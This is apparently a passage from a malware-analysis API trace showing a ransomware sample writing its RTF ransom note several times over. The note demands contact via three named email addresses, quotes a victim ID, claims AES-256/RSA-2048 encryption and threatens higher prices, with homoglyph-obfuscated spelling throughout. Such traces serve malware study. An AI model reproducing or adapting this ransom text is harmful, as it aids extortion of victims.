fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0135.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f 